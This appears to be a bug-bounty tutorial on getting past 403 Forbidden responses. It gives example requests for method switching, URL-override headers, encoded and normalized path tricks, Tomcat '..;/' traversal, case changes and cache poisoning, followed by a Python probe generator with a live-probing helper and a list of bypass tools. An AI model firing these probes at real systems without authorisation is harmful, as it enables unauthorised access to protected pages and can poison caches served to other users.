Learn About 403 Bypass

A web server answers 403 Forbidden when it refuses to serve the requested resource, usually because an access-control rule in front of the application denies that path. When you are bug hunting and dig into a target, you will frequently hit 403 Forbidden or Permission Denied on the most interesting paths, and many inexperienced hunters stop there. The access check is often a string match on the request as it arrives at the edge, while the application behind it parses the same request more liberally; a request that the check ignores but the application still routes to the protected page gets you the admin panel or other sensitive content, and a reproducible bypass is a reportable finding that can earn a bounty.

I'll walk you through a few manual bypass techniques and then list tools that automate the same probes. Now let's get going.

Manual Bypass

Request Method Manipulation: change the request method, for example GET to POST. Access rules are sometimes written per method (Apache's <Limit GET> block is the classic case), so the same path can be forbidden for GET and served for POST; HEAD, PUT, PATCH and OPTIONS are worth trying for the same reason.

GET /admin HTTP/1.1
Host: target.com

How to apply this

POST /admin HTTP/1.1
Host: target.com

Overriding the Target URL via Non-Standard Headers: X-Original-URL and X-Rewrite-URL. Some frameworks (Symfony's Request class reads both headers) and IIS rewrite setups route the request by the header value instead of the request line, so the rule at the edge sees /anything while the back end serves /admin.

GET /admin HTTP/1.1
Host: target.com

How to apply this

GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin

OR

GET /anything HTTP/1.1
Host: target.com
X-Rewrite-URL: /admin

Appending %2e after the first slash: the edge rule compares the raw path, while the back end percent-decodes %2e to a dot and normalizes the dot segment away, so /%2e/admin only becomes /admin after the check has already passed.

http://target.com/admin => 403

How to apply this

http://target.com/%2e/admin => 200

Try adding a dot (.), an extra slash (/) or a semicolon (;) to the URL. Dot segments and repeated slashes disappear when the back end normalizes the path, and ';' starts a path parameter that Java servlet containers such as Tomcat strip from the segment before routing, so a rule that matches the literal string /admin never sees these forms:

http://target.com/admin => 403

How to apply this

http://target.com/admin/. => 200
http://target.com//admin// => 200
http://target.com/./admin/.. => 200
http://target.com/;/admin => 200
http://target.com/.;/admin => 200
http://target.com//;//admin => 200

Add "..;/" after the directory name. This relies on the back end treating everything after ';' in a segment as a path parameter, which Java servlet containers such as Tomcat do; servers that do not will simply return 404.

http://target.com/admin

How to apply this

http://target.com/admin..;/

Try changing the case of letters in the URL. This works when the back end routes paths case-insensitively (IIS on Windows, for example) while the rule in front of it is case-sensitive:

http://target.com/admin

How to apply this

http://target.com/aDmIN

Via Web Cache Poisoning: the same override header can do more damage when a cache sits in front of the application and the header is not part of the cache key. The cache stores the /admin response under the key for /anything and serves it to every later visitor of /anything.

GET /anything HTTP/1.1
Host: victim.com
X-Original-URL: /admin
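Every manual technique above exploits the same thing: the rule at the edge matches the raw request while the application behind it decodes, strips and normalizes the path before routing. The following is an added example (my code, not from the original page or from any of the tools listed below) that models such a naive edge rule and a permissive back end, runs one probe per technique through both, and reports which ones reach the protected page. The edge behaviour (exact match on the raw path, GET only), the back-end behaviour (override headers honoured, Tomcat-style ';' handling, case-insensitive routing), the path /admin and the optional probe_live() helper are assumptions for illustration.

```python
"""Model of the normalization mismatch behind the manual 403 bypasses above.

A naive edge rule matches the raw request, the application behind it
parses the same request more liberally, and every difference between the
two is a bypass candidate. The edge/back-end behaviour here is assumed for
illustration; probe_live() sends the same candidates to a real host.
"""
import posixpath
import re
from urllib.parse import unquote

FORBIDDEN = "/admin"


def edge_acl(method, raw_path):
    """Assumed edge rule: exact string match on the raw request-target,
    applied to GET only (the shape of an Apache <Limit GET> block).
    Returns True when the edge would answer 403."""
    return method == "GET" and raw_path in (FORBIDDEN, FORBIDDEN + "/")


def backend_route(raw_path, headers):
    """Assumed back end: honours URL-override headers (Symfony reads
    X-Original-URL and X-Rewrite-URL), percent-decodes, drops ';param'
    path parameters per segment (Tomcat), collapses repeated slashes,
    resolves dot segments and routes case-insensitively (IIS-like).
    Returns the canonical path the application actually serves."""
    target = headers.get("X-Original-URL") or headers.get("X-Rewrite-URL") or raw_path
    target = unquote(target)                                   # %2e -> .
    target = "/".join(seg.split(";", 1)[0] for seg in target.split("/"))
    target = re.sub(r"/+", "/", target)                        # //admin// -> /admin/
    target = posixpath.normpath(target)                        # /./admin -> /admin
    return target.lower()


def request(method, raw_path, headers=None):
    """Run one probe through the edge and then the back end; return (status, body)."""
    headers = headers or {}
    if edge_acl(method, raw_path):
        return 403, "forbidden"
    if backend_route(raw_path, headers) == FORBIDDEN:
        return 200, "admin panel"
    return 404, "not found"


def candidates(path=FORBIDDEN):
    """Probes for one forbidden path, one per manual technique above.
    The '..;/' form is the Tomcat variant that steps out of a dummy directory."""
    name = path.strip("/")
    return [
        ("GET", path, {}),                                   # baseline, expect 403
        ("POST", path, {}),                                  # method switch
        ("GET", "/anything", {"X-Original-URL": path}),      # URL override headers
        ("GET", "/anything", {"X-Rewrite-URL": path}),
        ("GET", "/%2e" + path, {}),                          # encoded dot segment
        ("GET", path + "/.", {}),                            # trailing dot segment
        ("GET", "/" + path + "/", {}),                       # doubled slashes
        ("GET", "/;" + path, {}),                            # empty path parameter
        ("GET", "/.;" + path, {}),                           # dot with path parameter
        ("GET", "/anything/..;" + path, {}),                 # ..;/ directory step
        ("GET", "/" + name.swapcase(), {}),                  # case change
    ]


def find_bypasses(path=FORBIDDEN):
    """Return the probes that reach the protected page as (method, raw_path, header)."""
    hits = []
    for method, raw, hdrs in candidates(path):
        status, body = request(method, raw, hdrs)
        if status == 200 and body == "admin panel":
            hits.append((method, raw, next(iter(hdrs), None)))
    return hits


def probe_live(base_url, path=FORBIDDEN, timeout=5):
    """Send the same candidates to a real host you are authorised to test.
    Returns (method, raw_path, status, body_length) per probe; compare the
    lengths against the baseline 403 to spot a different page, not just a code."""
    import urllib.error
    import urllib.request
    results = []
    for method, raw, hdrs in candidates(path):
        req = urllib.request.Request(base_url + raw, method=method, headers=hdrs)
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                results.append((method, raw, resp.status, len(resp.read())))
        except urllib.error.HTTPError as err:
            results.append((method, raw, err.code, len(err.read())))
    return results


if __name__ == "__main__":
    for hit in find_bypasses():
        print(hit)
```

Against the modelled stack every probe except the baseline reaches the admin panel, which is the point: each one is a different way of saying /admin that the edge does not recognise. Against a real target most of them will fail, so compare response lengths and bodies rather than trusting a bare 200, since a "200" that is really the site's generic error page is not a bypass.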

Automated Bypass

Here's a list of tools I found that automate these probes against 40x status codes:
https://github.com/Sn1r/Forbidden-Buster

https://github.com/lobuhi/byp4xx

https://github.com/iamj0ker/bypass-403

https://github.com/gotr00t0day/forbiddenpass

https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122

https://github.com/intrudir/BypassFuzzer

https://github.com/ivan-sincek/forbidden